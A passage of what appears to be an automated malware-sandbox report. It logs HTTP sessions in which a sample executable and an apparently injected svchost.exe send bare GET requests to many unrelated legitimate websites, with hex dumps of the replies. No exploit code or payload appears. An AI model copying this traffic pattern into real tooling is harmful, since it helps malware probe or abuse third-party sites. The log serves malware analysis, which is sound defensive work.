2023-03-22 04:45:33 UTC	1023	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.2.5	21176	138.201.65.187	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:33 UTC	986	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: diamir.de
2023-03-22 04:45:33 UTC	986	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 22 Mar 2023 04:45:33 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.diamir.de/ Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
2023-03-22 04:45:33 UTC	986	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.2.5	21080	75.2.95.235	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:33 UTC	986	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: ldh.la.gov
2023-03-22 04:45:33 UTC	988	IN	HTTP/1.1 406 Not Acceptable Date: Wed, 22 Mar 2023 04:45:33 GMT Content-Type: text/html Content-Length: 1346 Connection: close Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET
2023-03-22 04:45:33 UTC	989	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.2.5	21355	185.237.66.112	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:33 UTC	986	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: techtrans.de
2023-03-22 04:45:33 UTC	987	IN	HTTP/1.1 403 Forbidden Date: Wed, 22 Mar 2023 04:45:33 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: 0 X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-03-22 04:45:33 UTC	987	IN	Data Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	50293	188.114.96.3	443	C:\Users\user\Desktop\6gjnnBAbpc.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:44:30 UTC	64	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: hyab.se
2023-03-22 04:44:30 UTC	64	IN	HTTP/1.1 302 Found Date: Wed, 22 Mar 2023 04:44:30 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Location: https://hyab.com Cache-Control: max-age=600 Expires: Wed, 22 Mar 2023 04:54:30 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=q5LQ0TmKXsrv2c1hvG0GVp80Nir8PU6b6NIJqVCfF9xyEEp5iLcJOI5kElC%2ByHt2miBj3%2B0rugQh813wIN2bbY6PmWczjgrX3QhDtZihIntGbH%2FXQjkHDMof"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc7a12d0539d0-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:44:30 UTC	65	IN	Data Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
2023-03-22 04:44:30 UTC	65	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.2.5	21432	138.201.65.187	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:33 UTC	987	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: www.diamir.de
2023-03-22 04:45:33 UTC	988	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Wed, 22 Mar 2023 04:45:33 GMT Content-Type: text/html Content-Length: 548 Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
2023-03-22 04:45:33 UTC	988	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.2.5	21567	5.189.171.125	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:33 UTC	990	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: www.muhr-soehne.de
2023-03-22 04:45:33 UTC	1023	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 04:45:33 GMT Server: Apache/2.4.38 (Debian) Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT Accept-Ranges: bytes Content-Length: 51841 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
2023-03-22 04:45:33 UTC	1024	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20 Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
2023-03-22 04:45:33 UTC	1040	IN	Data Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65 Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
2023-03-22 04:45:34 UTC	1056	IN	Data Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
2023-03-22 04:45:34 UTC	1072	IN	Data Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	192.168.2.5	22849	188.114.96.3	443	C:\Users\user\Desktop\6gjnnBAbpc.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:35 UTC	1074	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: sigtoa.com
2023-03-22 04:45:35 UTC	1075	IN	HTTP/1.1 403 Forbidden Date: Wed, 22 Mar 2023 04:45:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Frame-Options: SAMEORIGIN Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3gCVoP9B2Ggka7QVCnWEt3ak7dXyw9AFN4mOOPCjD6O8EQEpiWQRege08cYek4AKcFuebLCwyFEVQHs3RsVRRvnOjZaoQ4330WPRQiWVyRs6bxDiORBsYgdNDaGG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc9385dfe2bce-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:35 UTC	1076	IN	Data Raw: 31 65 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 Data Ascii: 1e93<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible"
2023-03-22 04:45:35 UTC	1076	IN	Data Raw: 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c Data Ascii: content="IE=Edge"> <meta name="robots" content="noindex,nofollow"> <meta name="viewport" content="width=device-width,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js"> <div cl
2023-03-22 04:45:35 UTC	1077	IN	Data Raw: 20 6e 65 65 64 73 20 74 6f 20 72 65 76 69 65 77 20 74 68 65 20 73 65 63 75 72 69 74 79 20 6f 66 20 79 6f 75 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 66 6f 72 65 20 70 72 6f 63 65 65 64 69 6e 67 2e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 6f 79 72 2e 59 57 42 6a 62 34 45 34 49 7a 34 6d 49 69 35 6e 44 6b 4a 49 33 46 68 78 4e 43 56 38 73 6c 30 69 43 44 4a 4a 5a 31 4d 2d 31 36 37 39 34 36 30 33 33 35 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 Data Ascii: needs to review the security of your connection before proceeding. </div> <form id="challenge-form" action="/?__cf_chl_f_tk=oyr.YWBjb4E4Iz4mIi5nDkJI3FhxNCV8sl0iCDJJZ1M-1679460335-0-gaNycGzNCPs" method="POST" enctype="application/x-www-for
2023-03-22 04:45:35 UTC	1079	IN	Data Raw: 71 70 64 42 43 6c 33 4e 75 6e 61 44 34 78 2d 4b 34 44 42 32 77 52 4c 52 65 67 77 7a 73 50 4a 4a 54 34 67 64 64 6d 62 42 33 37 34 50 74 6a 49 41 54 66 32 46 52 4b 41 75 35 54 66 4c 42 72 72 55 47 6b 37 33 51 57 4e 56 58 4d 58 79 7a 47 53 7a 64 59 6c 38 76 50 41 56 72 46 41 66 45 36 68 4b 54 79 74 5f 47 75 46 62 4a 77 59 6f 4e 34 34 4a 6c 48 75 4b 36 72 70 4b 6e 69 4e 72 30 58 78 72 64 38 62 48 36 62 4e 76 69 47 49 7a 67 72 76 70 6d 4f 47 51 61 56 49 5f 58 43 79 73 58 37 52 54 5a 4e 7a 4a 67 51 5a 68 44 74 5f 38 32 69 72 55 54 39 62 33 68 76 73 76 39 37 69 38 4a 65 63 47 34 32 4c 74 6d 6a 76 49 31 39 51 57 6f 34 49 6a 65 49 70 54 58 6f 58 6b 64 2d 6c 38 7a 6c 56 5f 58 7a 33 74 39 44 5a 64 61 37 48 44 2d 5a 33 58 46 42 70 36 68 6c 30 50 77 4d 62 34 41 65 49 Data Ascii: qpdBCl3NunaD4x-K4DB2wRLRegwzsPJJT4gddmbB374PtjIATf2FRKAu5TfLBrrUGk73QWNVXMXyzGSzdYl8vPAVrFAfE6hKTyt_GuFbJwYoN44JlHuK6rpKniNr0Xxrd8bH6bNviGIzgrvpmOGQaVI_XCysX7RTZNzJgQZhDt_82irUT9b3hvsv97i8JecG42LtmjvI19QWo4IjeIpTXoXkd-l8zlV_Xz3t9DZda7HD-Z3XFBp6hl0PwMb4AeI
2023-03-22 04:45:35 UTC	1080	IN	Data Raw: 20 20 20 20 20 20 20 20 63 5a 6f 6e 65 3a 20 27 73 69 67 74 6f 61 2e 63 6f 6d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4e 6f 75 6e 63 65 3a 20 27 38 34 35 31 35 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 52 61 79 3a 20 27 37 61 62 62 63 39 33 38 35 64 66 65 32 62 63 65 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 30 65 34 64 61 33 34 36 62 34 64 65 65 39 32 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 6f 79 72 2e 59 57 42 6a 62 34 45 34 49 7a 34 6d 49 69 35 6e 44 6b 4a 49 33 46 68 78 4e 43 56 38 73 6c 30 69 43 44 4a 4a 5a 31 4d 2d 31 36 37 39 34 36 30 33 33 Data Ascii: cZone: 'sigtoa.com', cType: 'managed', cNounce: '84515', cRay: '7abbc9385dfe2bce', cHash: '0e4da346b4dee92', cUPMDTk: "\/?__cf_chl_tk=oyr.YWBjb4E4Iz4mIi5nDkJI3FhxNCV8sl0iCDJJZ1M-167946033
2023-03-22 04:45:35 UTC	1081	IN	Data Raw: 20 6d 3a 20 27 6a 66 42 53 42 36 79 7a 46 6b 59 79 6c 64 59 6e 62 43 78 65 57 75 58 53 5a 38 44 53 77 68 34 4d 31 2b 64 4f 31 6a 2b 66 72 58 77 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 31 3a 20 27 58 4d 53 79 41 6f 67 4b 67 4e 33 63 56 79 6e 53 55 59 47 31 59 67 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 64 6f 6b 62 41 41 6a 75 46 41 58 55 37 65 76 4b 30 43 36 75 59 77 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 Data Ascii: m: 'jfBSB6yzFkYyldYnbCxeWuXSZ8DSwh4M1+dO1j+frXw=', i1: 'XMSyAogKgN3cVynSUYG1Yg==', i2: 'dokbAAjuFAXU7evK0C6uYw==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cF
2023-03-22 04:45:35 UTC	1083	IN	Data Raw: 34 49 7a 34 6d 49 69 35 6e 44 6b 4a 49 33 46 68 78 4e 43 56 38 73 6c 30 69 43 44 4a 4a 5a 31 4d 2d 31 36 37 39 34 36 30 33 33 35 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b Data Ascii: 4Iz4mIi5nDkJI3FhxNCV8sl0iCDJJZ1M-1679460335-0-gaNycGzNCPs" + window._cf_chl_opt.cOgUHash); cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[
2023-03-22 04:45:35 UTC	1083	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
